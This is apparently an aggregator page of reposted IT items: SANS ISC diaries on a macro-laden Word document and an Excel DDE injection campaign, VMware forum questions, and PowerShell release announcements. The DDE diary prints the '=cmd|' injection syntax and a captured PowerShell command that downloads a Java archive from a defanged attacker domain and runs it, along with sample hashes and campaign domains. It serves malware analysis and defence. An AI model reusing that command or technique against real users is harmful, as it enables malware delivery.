When DOSfuscation Helps…, (Sun, Sep 30th)

This post was originally published on this site

An anonymous reader submitted a malicious document after Brad posted his diary entry “One Emotet infection leads to three follow-up malware infections“.

This sample (MD5 dfff3a02e6e6a4d079c12f83dcc2f7a5) is a malicious Word document with VBA macros to launch a powershell command.

The command is “DOSfuscated“, and when I analyzed it by extracting strings and contatenating them, I encountered a small problem.

In this video, you can see how I did the complete analysis:

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

More Excel DDE Code Injection, (Fri, Sep 28th)

This post was originally published on this site

The “DDE code injection” technique is not brand new. DDE stands for “Dynamic Data Exchange”[1]. It has already been discussed by many security researchers[2]. Just a quick reminder for those who missed it. In Excel, it is possible to trigger the execution of an external command by using the following syntax:

=cmd|’arguments’!cell

If some malicious Excel files were spotted recently, I found yesterday a bunch of files all related to the same campaign. The interesting fact is that all those files have a VT score of 0! Indeed, they contain a lot of junk strings and,  in the middle of them, a DDE injection:

$ head -10 24711ad4f13bde4451ebac2a2f2a5c7406f048f6b56dc1ec868d7f2da5cc8c98.vir




lljecTcCsRfkqsBfL2ud7yg1Eeeb
KZiUlYv8rqf52TeMTPvmoOPxhmFYrInZMo897D
tWgf38B1VjbL2Rp4LXyCuaDbcAk9wuSuA3PLjDmXSmIaTb6ZxEcswmHSTRXo6Fl54NRVLl7onJMgJOnxGWXayUq
GgHUNdPiWdihpKxfhuQJetYn2CpxVWUzIQZwONaVYOwQ1pvP
RsrzZKKq1GjBhFzkzXQhs9i3A5Jvb46HdNyEqpMVJtlljecTcCsRfkqsBfL2ud7yg1EeebNrKZi
Yv8rqf52TeMTPvmoOPxhmFYrInZMo897DtjtWgf38B1VjbL

By default, Excel will consider any file not recognized as a valid sheet as CSV and will open it as is.

Here is the command executed:

powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile("hxxp://topehagepa[.]online" ," %temp%WJJWBHVFUG.jar") }" & %temp%WJJWBHVFUG.jar’

I’m using a YARA rule to catch them on VirusTotal and I already found some samples and related domain names.

SHA256 of samples:

002055c485975c5e66f0aa1f30eb9b96bc748285ced1147e7956577cf76180e2
ccc6bc1f52c0caa94626fc1616afcf8ebdc49a03a3dfa280c4395eeb75af144f
9d3b99b0fa2301d36bce4ae14c3df91813ed6583dd0ff7a312a66551771729a3
b8e494d1ca0ecaa36c2c7560dcc6124356aa333bb7db1416c79c1f0081ffc04f
24711ad4f13bde4451ebac2a2f2a5c7406f048f6b56dc1ec868d7f2da5cc8c98
2a0fba56858872b12d58c7d388f641e7f526ef8de814626005b209682c185a99
71ad0ea269cbcf7b170adecbc151286b69fc912b4babd08e87bd38269e21e5a4
ac411a12ab007383829aa30b2584d5865b5762455a952c405495809f78fb084e
90e26612d53425752261a88b21907e29a29ed8bb51847e4bd4cad2b2e399ba50
4eabaac1d528ab5143b3564138c0b5af41dee765a883140bc4797c2f635500a2
9b3064a08ad6729c5280941467de799886e92268a83be2407748bd38338ccb38
1987505b9b7ba75b0972b4152650ca8503de1a2d964df5dc33ec8aa10f71be59
61a9a14f8b50cbc38082ee5068608be7399a14ba84e79d536aec6fdeef54a9b4
7305236f00e95f64282309af810a7ec9a331cb07f5d708e3bf57c15b24e59a37
7d70ba42d1e5f6cdacaaccf11a8fc3166db9d846f1999673aff339163775d673
557c1e7a180708f45e8419a9439568872cacf20399f56345bbe33436b25f6e22

Domain names:

cafogekago[.]online
yepeyowora[.]online
jekarebege[.]online
gelovosaja[.]club
topehagepa[.]online
nomawesefa[.]club
saboverome[.]online
vazawoweso[.]online

All the domains resolve to the same IP address: %%ip:54.36.212.133%% (located at OVH in France) but the server is down at the moment. The downloaded file being a Java archive, there are chances that it’s a classic Trojan. Anybody successfully got access to this files? I’d be happy to have a look at it.

[1] https://docs.microsoft.com/en-us/windows/desktop/dataxchg/dynamic-data-exchange
[2] https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Adding more cores to a VMClient : Feature ‘Hot-Pluggable virtual HW’ is not licensed with this edition

This post was originally published on this site

I am trying to add more cores to a VM client running on  the following HP Server and I am getting the following error:

 

Feature ‘Hot-Pluggable virtual HW’ is not licensed with this edition.

 

What do I need to purchase in order to add more cores?  The server has 1 CPU and 6 cores?

 

Product: VMware vSphere 6 Hypervisor Licensed for 1 physical CPUs (unlimited cores per CPU)
License Key: H129K-0UL9L-28Y88-XXXX-XXXX
Expires: Never

Product Features:
    Up to 8-way virtual SMP

 

Reconfiguration fails on standalone with vim.fault.NoPermission during registry access

This post was originally published on this site

The relevant fragment of the worker log appears to be as below.  What could this be caused by?  Is there a possible workaround / solution?

—————–

 

2018-09-13T23:46:00.234+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=task-3] Starting system reconfiguration …

2018-09-13T23:46:00.234+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=Default] Using temp dir C:WINDOWSTEMPvmware-tempvmware-SYSTEMsysReconfig

2018-09-13T23:46:00.281+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=task-3] ReconfigurationTransaction: cached guest system volume

2018-09-13T23:46:00.281+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=task-3] ReconfigurationTransaction: cached guest system volume

2018-09-13T23:46:00.281+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=task-3] LocalPathToGuestSystemFolder: .vstor2-mntapi20-shared-8C73F4D0000010000000000005000000WINDOWS

2018-09-13T23:46:00.281+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=task-3] LocalUndoFolder: .vstor2-mntapi20-shared-8C73F4D0000010000000000005000000WINDOWS$Reconfig$

2018-09-13T23:46:00.828+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=Default] [LoadTempHive] Registry hive .vstor2-mntapi20-shared-8C73F4D0000010000000000005000000WINDOWSsystem32configSYSTEM is loaded under the name mntApi233162130830690227

2018-09-13T23:46:02.109+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=Default] [LoadTempHive] Registry hive .vstor2-mntapi20-shared-8C73F4D0000010000000000005000000WINDOWSsystem32configSOFTWARE is loaded under the name mntApi233646505830690227

2018-09-13T23:46:02.109+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=task-3] Populating predefined expressions …

2018-09-13T23:46:02.109+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=task-3] Processing user-defined expressions …

2018-09-13T23:46:02.109+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=task-3] Evaluating registry expression, Key = CurrentControlSetServicesACPIValueName StartValueType 1 dataPattern 0

2018-09-13T23:46:02.109+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=task-3] Evaluating registry expression, Key = MicrosoftWindows NTCurrentVersionValueName CurrentTypeValueType 0 dataPattern Multiprocessor.*

2018-09-13T23:46:02.125+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=task-3] Evaluating registry expression, Key = CurrentControlSetControlCriticalDeviceDatabaseprimary_ide_channelValueName ServiceValueType 0 dataPattern atapi

2018-09-13T23:46:02.125+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=task-3] Evaluating registry expression, Key = CurrentControlSetControlCriticalDeviceDatabasesecondary_ide_channelValueName ServiceValueType 0 dataPattern atapi

2018-09-13T23:46:02.125+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=task-3] Applying reconfigurations …

2018-09-13T23:46:02.156+01:00 error vmware-converter-worker[05116] [Originator@6876 sub=task-3] Error 2 (opening key) saving registry key mntApi233162130830690227ControlSet001Servicesrhelfltr into .vstor2-mntapi20-shared-8C73F4D0000010000000000005000000WINDOWS$Reconfig$mntApi233162130830690227-ControlSet001-Services-rhelfltr-reg

2018-09-13T23:46:02.250+01:00 error vmware-converter-worker[05116] [Originator@6876 sub=task-3] Error 5 (error restoring key: Access is denied (5)) restoring registry key C:Program FilesVMwareVMware vCenter Converter StandalonedataSKUNKWORKS_FILLER into mntApi233162130830690227ControlSet001Servicesrhelfltr

2018-09-13T23:46:02.250+01:00 error vmware-converter-worker[05116] [Originator@6876 sub=task-3] Reconfiguration failed with: vim.fault.NoPermission

2018-09-13T23:46:02.250+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=task-3] Rolling back the reconfiguration transaction…

2018-09-13T23:46:02.250+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=task-3] Deleting pending files…

2018-09-13T23:46:02.250+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=task-3] Writing the undo log …

2018-09-13T23:46:02.328+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=Default] Unloaded hive mntApi233646505830690227

2018-09-13T23:46:02.359+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=Default] Unloaded hive mntApi233162130830690227

2018-09-13T23:46:02.359+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=Default] Cleaning up temp directory C:WINDOWSTEMPvmware-tempvmware-SYSTEMsysReconfig …

2018-09-13T23:46:02.359+01:00 error vmware-converter-worker[05116] [Originator@6876 sub=task-3] TaskImpl has failed with MethodFault::Exception: converter.fault.ReconfigurationFault

2018-09-13T23:46:02.359+01:00 error vmware-converter-worker[05116] [Originator@6876 sub=Default] Task failed:

Announcing PowerShell Core 6.1

This post was originally published on this site

We’re proud to announce that the latest version of PowerShell has been released! This marks our second supported release of PowerShell Core, the open-source edition of PowerShell that works on Linux, macOS, and Windows!

By far, the biggest feature of this release is compatibility of built-in Windows modules with PowerShell Core. This means that you can natively run those modules/cmdlets with PowerShell Core and easily transition from Windows PowerShell.

Thanks to everyone that made this release possible, including our contributors, users, and anyone who filed issues and submitted feedback.

Just give me the bits!

For info on installing PowerShell Core 6.1, check out our installation docs.

What’s new?

We’ve released a slew of new features in 6.1, including:

  • Compatibility with 1900+ existing cmdlets in Windows 10 and Windows Server 2019
  • Built on top of .NET Core 2.1
  • Support for the latest versions of Windows, macOS, and Linux
    (see below)
  • Significant performance improvements
    • Markdown cmdlets
  • Experimental feature flags

For a more in-depth look at what’s included, take a look at our release notes, or for a complete list of changes, check out our CHANGELOG on GitHub.

Operating system support

You can always find an up-to-date list of support operating systems and PowerShell Core versions at https://aka.ms/pslifecycle.

On release, PowerShell Core 6.1 supports:

  • Windows 7/8.1/10
  • Windows Server 2008R2/2012/2012R2/2016 (and 2019 on release)
  • Windows Server Semi-Annual Channel (SAC)
  • macOS 10.12+
  • Ubuntu 14.04/16.04/18.04
  • Debian 8.7+/9
  • CentOS 7
  • Red Hat Enterprise Linux (RHEL) 7
  • OpenSUSE 42.3
  • Fedora 27/28

Platforms with unofficial “community” support also include:

  • Ubuntu 18.10
  • Arch Linux
  • Raspbian (ARM32)
  • Kali Linux
  • Alpine (experimental Docker image coming soon)

How can I provide feedback?

As always, you can file issues on GitHub to let us know about any features you’d like added or bugs that you encounter. Additionally, you can join us for the PowerShell Community Call on the 3rd Thursday of every month. The Community Call is a great opportunity to talk directly to the team, hear about the latest developments in PowerShell, and to voice your opinions into ongoing feature design.

Of course, we’re always looking for contributions that make PowerShell better. We love when our community helps out with code contributions, but you don’t have to be a rockstar developer to make a difference in PowerShell, as we’re also happy to accept test and documentation contributions as well.

Thanks, and enjoy PowerShell 6.1!

Joey Aiello
Program Manager, PowerShell

New Look and Features for PowerShell Gallery

This post was originally published on this site

The PowerShell Gallery and PowerShellGet have just been updated to provide new features, performance improvements, and a new modern design.  

NOTE: This post has important information for publishers in the “Accounts and publishing” section. 

PowerShell Gallery Home Page

PowerShell Gallery Home Page

The PowerShell Gallery is the place to find PowerShell code that is shared by the community, Microsoft, and other companies. The site has averaged over 21 million downloads per month for the past 6 months, and has more than 3,800 unique packages available for use. It’s amazing when we consider we were handling just under 4 million downloads in July 2017. We clearly needed to invest in the PowerShell Gallery to support that kind of growth.

We have been working for some time to improve the performance of the PowerShell Gallery. The result is now available to everyone, and includes new features, performance enhancements, security improvements to accounts and publishing keys, and better alignment with the NuGet.org codebase that we rely on for our service and cmdlets.

New features and performance enhancements

Most users should see an improvement in package download speeds from the PowerShell Gallery. The new release takes advantage of CDN to provide faster downloads, particularly for those outside the United States. This should be most noticeable when installing a module with many dependencies.  

The new updates include things users have requested for a long time, including:

  • A manual download option from the PowerShell Gallery. It cannot replace install-module / install-script, but does solve some specific issues for those with private repositories or older versions of PowerShell.
  • A change to Install-Module and Install-Script to simply install to the current user scope when not running in an elevated PowerShell session.

The new user experience is more than just a face-lift, as providing a modern UI also improves the performance. The PowerShell Gallery pages now display only the most critical information initially, and move the details to expanding sections in the UI. This makes the pages faster and easier for users to find the content they want to see.

Accounts and publishing improvements

The changes with the most immediate impact in this release are for publishers and users with PowerShell Gallery accounts.   

Most important: Publishers must update to PowerShellGet module version 1.6.8 or higher to publish to the PowerShell Gallery. Older versions of PowerShellGet are fine for find, save, install, and update functions, but not for publishing.    

The PowerShell Gallery implemented several security best practices:

  • New API keys you create will have an expiration that ranges from 1 to 365 days.
  • We will not show the value of an API key in the UI, and the value must be copied immediately after creating or regenerating it.
  • Multiple API keys can be created, and defined for specific uses – such as only being available to publish packages with specific names.
  • Your existing API key will still work, and will be listed as a “Full access API key”. However, you will not be able to view the current API key value or refresh it. If you lose the key value, you will need to create a new key that has an expiration date.

These changes are explained in more detail in the PowerShell Gallery documentation, and are the most significant changes included in this release.

Account management in the Powershell Gallery is also improved, and adds support for

  • Two factor authentication for accessing the PowerShell Gallery account. This is a security best practice and is highly recommended.
  • Changing the email address or login account associated with their PowerShell Gallery ID

You can find out more about the new Account settings features here.

Aligning with NuGet

The previous versions of PowerShell Gallery and PowerShellGet were based on older versions of NuGet. With this change we are aligning much more closely with the current state of the NuGet server and client. Many of the changes listed above – including the account and API key management – came directly from the NuGet updates. Another feature NuGet implemented is the ability to delete a package they have published accidentally, within the first hour after publishing.

 As we move closer to alignment with how NuGet.org works, we expect to provide new features that are available from the NuGet team.  Other changes we are considering that are available today at NuGet.org include support for namespaces and organizational accounts.

Let us know what you think

If you have any feedback on the changes we have made, or future changes we should consider, please do let us know. Visit https://aka.ms/PowerShellGalleryIssues to review what others are saying, or to let us know of other things we should be looking into.

 

ESXi 6.0 U3 installation stuck on enter root password page

This post was originally published on this site

HI while installing custom made ESXi 6.0 image into HP Proliant DL380 Gen 10 server, I am stuck on enter root password page.

 

My logical disk is show at remote section and not on local. I can still choose remote location and pressing enter takes me to set root password.

 

This is where I am stuck, I try to enter password to root section but as soon as I hit seven characters it says password mismatch, even though I have not enter password on confirm password section.

Pressing enter key dose not seem to work here but still can press back (F9) and ESC key.

 

Not sure what the problem is.

 

The custom image consist of ESXi 6.0.0 offline bundle and contains this driver VIB package from HP website found below:

Drivers & Software – HPE Support Center.

DSC Resource Kit Release September 2018

This post was originally published on this site

We just released the DSC Resource Kit!

This release includes updates to 11 DSC resource modules. In the past 6 weeks, 146 pull requests have been merged and 105 issues have been closed, all thanks to our amazing community!

The modules updated in this release are:

  • CertificateDsc
  • NetworkingDsc
  • SecurityPolicyDsc
  • SharePointDsc
  • SqlServerDsc
  • StorageDsc
  • xActiveDirectory
  • xDatabase
  • xExchange
  • xRemoteDesktopSessionHost
  • xWebAdministration

For a detailed list of the resource modules and fixes in this release, see the Included in this Release section below.

Our last community call for the DSC Resource Kit was on August 29. A recording of our updates will be available on YouTube soon. Join us for the next call at 12PM (Pacific time) on October 10 to ask questions and give feedback about your experience with the DSC Resource Kit.

The next DSC Resource Kit release will be going out one week later than usual on Wednesday, October 24, 2018. This will not shift any other dates, so the community call will still be on October 10, and the following release will be on November 28.

We strongly encourage you to update to the newest version of all modules using the PowerShell Gallery, and don’t forget to give us your feedback in the comments below, on GitHub, or on Twitter (@PowerShell_Team)!

Please see our documentation here for information on the support of these resource modules.

Included in this Release

You can see a detailed summary of all changes included in this release in the table below. For past release notes, go to the README.md or CHANGELOG.md file on the GitHub repository page for a specific module (see the How to Find DSC Resource Modules on GitHub section below for details on finding the GitHub page for a specific module).

Module Name Version Release Notes
CertificateDsc 4.2.0.0
  • Added a CODE_OF_CONDUCT.md with the same content as in the README.md – fixes Issue 139.
  • Refactored module folder structure to move resource to root folder of repository and remove test harness – fixes Issue 142.
  • Updated Examples to support deployment to PowerShell Gallery scripts.
  • Correct configuration names in Examples – fixes Issue 150.
  • Correct filename case of CertificateDsc.Common.psm1 – fixes Issue 149.
  • Remove exclusion of all tags in appveyor.yml, so all common tests can be run if opt-in.
  • PfxImport:
    • Added requirements to README.MD to specify cryptographic algorithm support – fixes Issue 153.
    • Changed Path parameter to be optional to fix error when ensuring certificate is absent and certificate file does not exist on disk – fixes Issue 136.
    • Removed ShouldProcess because it is not required by DSC Resources.
    • Minor style corrections.
    • Changed unit tests to be non-destructive.
    • Improved naming and description of example files.
    • Added localization string ID suffix for all strings.
  • Added .VSCode settings for applying DSC PSSA rules – fixes Issue 157.
NetworkingDsc 6.1.0.0
  • MSFT_Firewall:
    • Added full stop to end of MOF field descriptions.
    • Support for [, ] and * characters in the Name property added – fixes Issue 348.
    • Improved unit tests to meet style guidelines.
SecurityPolicyDsc 2.5.0.0
  • Added handler for null value in SecurityOption
  • Moved the helper module out from DSCResource folder to the Modules folder.
  • Fixed SecurityPolicyResourceHelper.Tests.ps1 so it possible to run the tests locally.
  • Fixed minor typos.
SharePointDsc 2.5.0.0
  • SPAppCatalog
    • Updated resource to retrieve the Farm account instead of requiring it to be specifically used
  • SPDatabaseAAG
    • Updated readme.md to specify that this resource also updates the database connection string
  • SPDiagnosticsProvider
    • Fixed issue where enabling providers did not work
  • SPFarm
    • Added ability to check and update CentralAdministrationPort
  • SPLogLevel
    • Added High as TraceLevel, which was not included yet
  • SPRemoteFarmTrust
    • Updated readme.md file to add a link that was lost during earlier updates
  • SPSearchServiceApp
    • Updated Set method to check if service application pool exists. Resource will throw an error if it does not exist
  • SPSearchTopology
    • Fixed issue where Get method threw an error when the specified service application didn’t exist yet
    • Fixed issue where the resource would fail is the FQDN was specified
  • SPShellAdmins
    • Added ExcludeDatabases parameter for AllDatabases
  • SPSite
    • Added ability to check and update QuotaTemplate, OwnerAlias and SecondaryOwnerAlias
  • SPSiteUrl
    • New resource to manage site collection urls for host named site collections
  • SPTrustedIdentityTokenIssuerProviderRealm
    • Fixed issue where Get method threw an error when the realm didn’t exist yet
  • SPUserProfileServiceApp
    • Fix for issue where an update conflict error was thrown when new service application was created
    • Added SiteNamingConflictResolution parameter to the resource
SqlServerDsc 12.0.0.0
  • Changes to SqlServerDatabaseMail
    • DisplayName is now properly treated as display name for the originating email address (issue 1200). Nick Reilingh (@NReilingh)
      • DisplayName property now defaults to email address instead of server name.
      • Minor improvements to documentation.
  • Changes to SqlAGDatabase
  • Changes to SqlDatabaseOwner
    • BREAKING CHANGE: Support multiple instances on the same node. The parameter InstanceName is now Key and cannot be omitted (issue 1197).
  • Changes to SqlSetup
    • Added new parameters to allow to define the startup types for the Sql Engine service, the Agent service, the Analysis service and the Integration Service. The new optional parameters are respectively SqlSvcStartupType, AgtSvcStartupType, AsSvcStartupType, IsSvcStartupType and RsSvcStartupType (issue 1165. Maxime Daniou (@mdaniou)
StorageDsc 4.1.0.0
  • Enabled PSSA rule violations to fail build – Fixes Issue 149.
  • Fixed markdown rule violations in CHANGELOG.MD.
  • Disk:
    • Corrected message strings.
    • Added message when partition resize required but AllowDestructive parameter is not enabled.
    • Fix error when Size not specified and AllowDestructive is $true and partition can be expanded – Fixes Issue 162.
    • Fix incorrect error displaying when newly created partition is not made Read/Write.
    • Change verbose messages to show warnings when a partition resize would have occured but the AllowDestructive flag is set to $false.
xActiveDirectory 2.21.0.0
xDatabase 1.9.0.0
  • xDatabase Test-TargetResource will now check DacPacVersion if DacPacPath parameter and DB exist. If the DacPacApplicationVersion is supplied and matches the deployed version we will return $true. (issue 41)
xExchange 1.23.0.0
  • Fixes issue with xExchMaintenanceMode on Exchange 2016 where the cluster does not get paused when going into maintenance mode. Also fixes issue where services fail to stop, start, pause, or resume.
  • Explicitly cast member types in Get-DscConfiguration return hashtables to align with the types defined in the resource schemas. Fixes an issue where Get-DscConfiguration fails to return a value.
  • xExchClientAccessServer: Fixes issue where AlternateServiceAccountConfiguration or RemoveAlternateServiceAccountCredentials parameters can”t be used at the same time as other optional parameters.
  • xExchInstall: Fixes issue where Test-TargetResource returns true if setup is running. Fixes issue where setup is not detected as having been successfully completed even if setup was successful. Adds initial set of unit tests for xExchInstall and related functions.
  • Remove VerbosePreference from function parameters and update all calls to changed functions.
  • Fixes multiple PSScriptAnalyzer issues. Specifically, fixes all instances of PSAvoidTrailingWhitespace, PSAvoidGlobalVars, PSAvoidUsingConvertToSecureStringWithPlainText, PSUseSingularNouns, and fixes many instances of PSUseDeclaredVarsMoreThanAssignments.
  • Add support for Exchange Server 2019 – Preview
xRemoteDesktopSessionHost 1.8.0.0
  • Changes to xRDSessionDeployment
    • Fixed issue where an initial deployment failed due to a convert to lowercase (issue 39).
    • Added unit tests to test Get, Test and Set results in this resource.
  • Change to xRDRemoteApp
    • Fixed issue where this resource ignored the CollectionName provided in the parameters (issue 41).
    • Changed key values in schema.mof to only Alias and CollectionName, DisplayName and FilePath are not key values.
    • Added Ensure property (Absent or Present) to enable removal of RemoteApps.
    • Added unit tests to test Get, Test and Set results in this resource.
xWebAdministration 2.2.0.0
  • Added new parameter “Location” to WebApplcationHandler extending functionality to address [392]
  • Changes to xWebAdministration
    • Update section header for WebApplicationHandler in README.
    • Fix tests for helper function Get-LocalizedData in Helper.Tests.ps1 that referenced the wrong path.
  • Remove duplication in MSFT_xWebsite.psm1. Krzysztof Morcinek (@kmorcinek)
  • Updates xIISMimeTypeMapping to add MIME type mapping for nested paths

How to Find Released DSC Resource Modules

To see a list of all released DSC Resource Kit modules, go to the PowerShell Gallery and display all modules tagged as DSCResourceKit. You can also enter a module’s name in the search box in the upper right corner of the PowerShell Gallery to find a specific module.

Of course, you can also always use PowerShellGet (available starting in WMF 5.0) to find modules with DSC Resources:

# To list all modules that tagged as DSCResourceKit
Find-Module -Tag DSCResourceKit 
# To list all DSC resources from all sources 
Find-DscResource

Please note only those modules released by the PowerShell Team are currently considered part of the ‘DSC Resource Kit’ regardless of the presence of the ‘DSC Resource Kit’ tag in the PowerShell Gallery.

To find a specific module, go directly to its URL on the PowerShell Gallery:
http://www.powershellgallery.com/packages/< module name >
For example:
http://www.powershellgallery.com/packages/xWebAdministration

How to Install DSC Resource Modules From the PowerShell Gallery

We recommend that you use PowerShellGet to install DSC resource modules:

Install-Module -Name < module name >

For example:

Install-Module -Name xWebAdministration

To update all previously installed modules at once, open an elevated PowerShell prompt and use this command:

Update-Module

After installing modules, you can discover all DSC resources available to your local system with this command:

Get-DscResource

How to Find DSC Resource Modules on GitHub

All resource modules in the DSC Resource Kit are available open-source on GitHub.
You can see the most recent state of a resource module by visiting its GitHub page at:
https://github.com/PowerShell/< module name >
For example, for the CertificateDsc module, go to:
https://github.com/PowerShell/CertificateDsc.

All DSC modules are also listed as submodules of the DscResources repository in the DscResources folder and the xDscResources folder.

How to Contribute

You are more than welcome to contribute to the development of the DSC Resource Kit! There are several different ways you can help. You can create new DSC resources or modules, add test automation, improve documentation, fix existing issues, or open new ones.
See our contributing guide for more info on how to become a DSC Resource Kit contributor.

If you would like to help, please take a look at the list of open issues for the DscResources repository.
You can also check issues for specific resource modules by going to:
https://github.com/PowerShell/< module name >/issues
For example:
https://github.com/PowerShell/xPSDesiredStateConfiguration/issues

Your help in developing the DSC Resource Kit is invaluable to us!

Questions, comments?

If you’re looking into using PowerShell DSC, have questions or issues with a current resource, or would like a new resource, let us know in the comments below, on Twitter (@PowerShell_Team), or by creating an issue on GitHub.

Katie Keim
Software Engineer
PowerShell DSC Team
@katiedsc (Twitter)
@kwirkykat (GitHub)

What is Malware

This post was originally published on this site

Malware is software–a computer program–used to perform malicious actions. In fact, the term malware is a combination of the words malicious and software. Cyber criminals install malware on your computers or devices to gain control over them or gain access to what they contain. Once installed, these attackers can use malware to spy on your online activities, steal your passwords and files, or use your system to attack others.